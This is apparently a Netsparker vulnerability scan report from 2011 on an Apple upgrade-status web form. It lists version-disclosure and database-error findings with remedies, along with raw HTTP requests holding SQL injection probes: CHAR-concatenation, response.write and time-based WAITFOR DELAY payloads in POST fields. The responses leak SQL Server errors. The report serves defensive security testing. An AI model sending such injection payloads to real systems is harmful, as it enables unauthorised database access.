<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=%27AND%201&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Incorrect syntax near the keyword 'AND'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 'AND 1=(CHAR(95)+CHAR(33)+CHAR(64)+CHAR(50)+CHAR(100)+CHAR(105)+CHAR(108)+CHAR(101)+CHAR(109)+CHAR(109)+CHAR(97))+'
email POST netsparker@example.com
submit POST   Check Status  

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 259
Expect: 100-continue
Accept-Encoding: gzip, deflate

company=3&firstname=Smith&lastname=Smith&zip='AND%201=(CHAR(95)%2BCHAR(33)%2BCHAR(64)%2BCHAR(50)%2BCHAR(100)%2BCHAR(105)%2BCHAR(108)%2BCHAR(101)%2BCHAR(109)%2BCHAR(109)%2BCHAR(97))%2B'&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 02:05:08 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4223
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1726


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=%27AND%201&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Incorrect syntax near the keyword 'AND'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
Apache Version Disclosure

Apache Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Extracted Version

2.2.17

Request

GET /cgi-bin/upgrade_query/query.pl HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: wsidecar.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 5598
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 2013


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --><div id="container"><div id="header"> <h1>Status Inquiry</h1></div> <div id="main"><p>To check the status of your Mail or Fax upgrade, please complete the short form below. Information must be entered exactly as it was submitted on your order form.</p> <form method="post" action="http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl" onsubmit="return checkfields()"></div> <!-- eof top --> <label for="company"><strong>Select Program</strong></label> <p><SELECT NAME="promoid"> <OPTION VALUE = "Select Program" SELECTED>Select Program:</option> <OPTION VALUE = "iLife-thru10|19">iLife Up to Date</option> <OPTION VALUE = "iLife-from10|20">iLife Up to Date On or After 10/20</option> </SELECT></font></p><!--#ERR--> <hr size="1"> <div class="subcolumn1-2"> <label for="company"><strong>Company Name</strong> <span class="sosumi">(required)</span></label> <p><input name="company" type="text" size="30" maxlength="50" value="" class="required"></p> <p><strong>OR</strong></p> <label for="firstname"><strong>First Name</strong> <span class="sosumi">(required)</span></label> <p><input name="firstname" type="text" size="30" maxlength="30" value="" class="required"></p> <label for="lastname"><strong>Last Name</strong> <span class="sosumi">(required)</span></label> <p><input name="lastname" type="text" size="30" maxlength="30" value="" class="required"></p> </div> <div class="subcolumn2-2"> <label for="zip"><strong>Zip Code</strong> <span class="sosumi">(required)</span></label> <p><input name="zip" type="text" size="30" maxlength="11" value="" class="required"></p> <label for="phone"><strong>Email Address</strong></label> <p><input name="email" type="text" size="30" maxlength="50" value=""></p> </div> <div class="clearer">&nbsp;</div> <input type="submit" name="submit" value="&nbsp;&nbsp;Check Status&nbsp;&nbsp;" align="right"> <p class="sosumi">* Either company (if applicable) or customer name are required.</p> </form> <div class="clearer">&nbsp;</div></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
PHP Version Disclosure

PHP Version Disclosure
1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. Also the attacker can use this information in conjunction with the other vulnerabilities in the application or the web server.

Classification

OWASP A6 PCI v1.2-6.5.6 WASC-13
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Extracted Version

PHP/5.3.4

Request

GET /cgi-bin/upgrade_query/query.pl HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: wsidecar.apple.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:34 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 5598
Keep-Alive: timeout=15, max=497
Connection: Keep-Alive
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 2013


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --><div id="container"><div id="header"> <h1>Status Inquiry</h1></div> <div id="main"><p>To check the status of your Mail or Fax upgrade, please complete the short form below. Information must be entered exactly as it was submitted on your order form.</p> <form method="post" action="http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl" onsubmit="return checkfields()"></div> <!-- eof top --> <label for="company"><strong>Select Program</strong></label> <p><SELECT NAME="promoid"> <OPTION VALUE = "Select Program" SELECTED>Select Program:</option> <OPTION VALUE = "iLife-thru10|19">iLife Up to Date</option> <OPTION VALUE = "iLife-from10|20">iLife Up to Date On or After 10/20</option> </SELECT></font></p><!--#ERR--> <hr size="1"> <div class="subcolumn1-2"> <label for="company"><strong>Company Name</strong> <span class="sosumi">(required)</span></label> <p><input name="company" type="text" size="30" maxlength="50" value="" class="required"></p> <p><strong>OR</strong></p> <label for="firstname"><strong>First Name</strong> <span class="sosumi">(required)</span></label> <p><input name="firstname" type="text" size="30" maxlength="30" value="" class="required"></p> <label for="lastname"><strong>Last Name</strong> <span class="sosumi">(required)</span></label> <p><input name="lastname" type="text" size="30" maxlength="30" value="" class="required"></p> </div> <div class="subcolumn2-2"> <label for="zip"><strong>Zip Code</strong> <span class="sosumi">(required)</span></label> <p><input name="zip" type="text" size="30" maxlength="11" value="" class="required"></p> <label for="phone"><strong>Email Address</strong></label> <p><input name="email" type="text" size="30" maxlength="50" value=""></p> </div> <div class="clearer">&nbsp;</div> <input type="submit" name="submit" value="&nbsp;&nbsp;Check Status&nbsp;&nbsp;" align="right"> <p class="sosumi">* Either company (if applicable) or customer name are required.</p> </form> <div class="clearer">&nbsp;</div></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
Database Error Message

Database Error Message
1 TOTAL
LOW
Netsparker identified a database error message.

Impact

The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.

Remedy

Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.

Classification

OWASP A6 PCI v1.2-6.5.6 PCI v2.0-6.5.5 CWE-200 CAPEC-118 WASC-13
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Parameters

Parameter Type Value
promoid POST response.write(268409241-22)'
company POST 3
firstname POST Smith
lastname POST Smith
zip POST 3
email POST netsparker@example.com
submit POST   Check Status  

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 161
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=response.write(268409241-22)%27&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:47 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4256
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1753


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <title>Apple - Press Info - Search Results</title> <meta http-equiv="pics-label" content='(pics-1.1 "http://www.icra.org/ratingsv02.html" l gen true for "http://www.apple.com" r (cz 1 lz 1 nz 1 oz 1 vz 1) "http://www.rsac.org/ratingsv01.html" l gen true for "http://www.apple.com" r (n 0 s 0 v 0 l 0))'> <meta http-equiv="Expires" content="Fri, 26 Mar 1999 23:59:59 GMT"> <meta http-equiv="pragma" content="no-cache"> <meta name="Author" content="Apple Inc."> <link rel="stylesheet" href="http://images.apple.com/global/styles/base.css" type="text/css" charset="utf-8"> <link rel="stylesheet" href="http://images.apple.com/global/nav/styles/nav.css" type="text/css" charset="utf-8"></head><body> <!--BEGIN NAV INCLUDE--> <script src="http://images.apple.com/global/nav/scripts/shortcuts.js" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> var searchSection = 'global'; var searchCountry = 'us'; </script><div id="globalheader"> <!--googleoff: all--> <ul id="globalnav"> <li id="gn-apple"><a href="http://www.apple.com/">Apple</a></li> <li id="gn-store"><a href="http://store.apple.com">Store</a></li> <li id="gn-mac"><a href="http://www.apple.com/mac/">Mac</a></li> <li id="gn-ipod"><a href="http://www.apple.com/ipod/">iPod</a></li> <li id="gn-iphone"><a href="http://www.apple.com/iphone/">iPhone</a></li> <li id="gn-ipad"><a href="http://www.apple.com/ipad/">iPad</a></li> <li id="gn-itunes"><a href="http://www.apple.com/itunes/">iTunes</a></li> <li id="gn-support"><a href="http://www.apple.com/support/">Support</a></li> </ul> <!--googleon: all--> <div id="globalsearch"> <form action="http://searchcgi.apple.com/cgi-bin/sp/nph-searchpre11.pl" method="post" class="search" id="g-search"> <div> <input type="hidden" value="utf-8" name="oe" id="search-oe"> <input type="hidden" value="p" name="access" id="search-access"> <input type="hidden" value="us_only" name="site" id="search-site"> <input type="hidden" value="lang_en" name="lr" id="search-lr"> <label for="sp-searchtext"><span class="prettyplaceholder">Search</span><input type="search" name="q" id="sp-searchtext" class="g-prettysearch applesearch" accesskey="s"></label> </div> </form> <div id="sp-results"><div class="inside"></div></div> </div></div><!-- END NAV BAR TABLE --> <!-- END NAV BAR TABLE --><div id="container"> <div id="header"> <h1>Status Inquiry</h1> </div> <div id="main"> <!-- query was http://apple.corporatesvcs.com/hwswinquiry.asp?email=netsparker@example%2Ecom&firstname=Smith&zip=3&promoid=response%2Ewrite%28268409241%2D22%29%27&lastname=Smith&company=3 --> <TD WIDTH="460" VALIGN="BOTTOM"> <FONT SIZE=2 FACE="GENEVA,HELVETICA,ARIAL"> <font face="Arial" size=2><p>Microsoft OLE DB Provider for SQL Server</font> <font face="Arial" size=2>error '80040e14'</font><p><font face="Arial" size=2>Line 1: Incorrect syntax near '3'.</font><p><font face="Arial" size=2>/hwswinquiry.asp</font><font face="Arial" size=2>, line 35</font> <BR>Thank you for using automated query.<BR>Regards,<BR>Apple</FONT> </TD> </TR></TABLE></div> </div> <div id="globalfooter" class="gf-980"> <div id="breadcrumbs"> <a href="http://www.apple.com/" class="home">Home</a> <span>&gt;</span> Start </div><!--/breadcrumbs--> <p class="gf-buy">Shop the Apple Store <a href="http://www.apple.com/store/">online</a> (1-800-MY-APPLE), visit an <a href="http://www.apple.com/retail/">Apple Store</a> location, or find a <a href="/buy/locator/">reseller</a>.</p><p class="gf-links"><a href="http://www.apple.com/sitemap/">Site Map</a> | <a href="http://www.apple.com/hotnews/">Hot News</a> | <a href="http://www.apple.com/rss/">RSS Feeds</a> | <a href="http://www.apple.com/contact/">Contact Us</a></p><p class="gf-sosumi">Copyright © 2010 Apple Inc. All rights reserved. <a href="http://www.apple.com/legal/terms/site.html">Terms of Use</a> | <a href="http://www.apple.com/legal/privacy/">Privacy Policy</a></p> </div><!--/globalfooter--></body></html>
Microsoft SQL Server Identified

Microsoft SQL Server Identified
1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using Microsoft SQL Server as backend database. This issue is reported for information purposes only.

Impact

This issue is reported as additional information only. There is no direct impact arising from this issue.
- /cgi-bin/upgrade_query/query.pl

/cgi-bin/upgrade_query/query.pl CONFIRMED

http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl

Request

POST /cgi-bin/upgrade_query/query.pl HTTP/1.1
Referer: http://wsidecar.apple.com/cgi-bin/upgrade_query/query.pl
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: wsidecar.apple.com
Content-Length: 166
Expect: 100-continue
Accept-Encoding: gzip, deflate

promoid=%27;WAITFOR%20DELAY%20%270:0:25%27--&company=3&firstname=Smith&lastname=Smith&zip=3&email=netsparker%40example.com&submit=%c2%a0%c2%a0Check+Status%c2%a0%c2%a0

Response

HTTP/1.1 200 OK
Date: Wed, 28 Sep 2011 01:37:46 GMT
Server: Apache/2.2.17 (Unix) PHP/5.3.4
MS-Author-Via: DAV
ntCoent-Length: 4126
Content-Type: text/html
Cache-Control: private
Content-Encoding:
Content-Length: 1728


